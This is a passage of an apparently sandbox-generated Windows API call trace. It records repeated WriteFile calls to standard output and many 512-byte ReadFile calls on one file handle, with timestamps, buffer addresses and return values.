nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.883] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.883] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.884] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.884] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: 